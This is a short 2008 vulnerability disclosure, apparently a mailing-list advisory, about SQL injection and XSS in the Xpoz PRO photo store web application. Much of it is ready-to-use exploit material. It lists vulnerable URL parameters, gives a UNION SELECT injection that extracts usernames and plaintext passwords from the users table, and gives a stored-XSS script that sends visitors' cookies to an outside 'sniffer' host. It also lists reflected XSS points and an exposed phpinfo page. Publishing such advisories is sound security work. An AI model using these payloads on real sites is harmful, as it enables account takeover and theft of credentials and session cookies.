Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[DSECRG-08-027] Multiple RFI-LFI in 1024 CMS 1.4.3, 1.4.4 RFC

Vulnerabilities in SLAED CMS

From:	Noname Noname <corwin88_(at)_mail.ru>
Date:	04.07.2008
Subject:	Xpoz SQL-INJECTION, XSS.

Xpoz SQL-INJECTION, XSS.

Application: Xpoz PRO (Expoze Photo Store)
------------

Website: http://xpoze.org
--------

Version: All(current 1.0)
--------

About:
------
Xpoze is a photo store very easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs.

Googledork: Powered by Powered by Xpoze.org
-----------

Date: 01-07-2008
-----

Description:
------------
Множественные уязвимости типа SQL-injection, активные и пассивные XSS.

[ SQL-INJECTION ]

http://host/home.html?menu=1[SQL]
http://host/user.html?uid=1[SQL]
http://host/account/admin/edite.html?eid=1[SQL]

and other...

===>>> Exploit:

http://host/user.html?uid=-1%20union%20select%201,user,1,1,1,pass,1,
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1%20from%20users%20limit%203,1/*

(!) Пароль в БД в открытом виде (!)

[ ACTIVE XSS ]

В форуме отсутствует фильтрация полей темы и сообщения.

===>>> Exploit:

<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>

[ PASSIVE XSS :) ]

http://host/?tpl=[XSS]
http://host/home.
html?title=on&description=on&photo=on&keywords=[XSS]

and

PHPInfo - http://host/phpinfo.php


...by Corwin...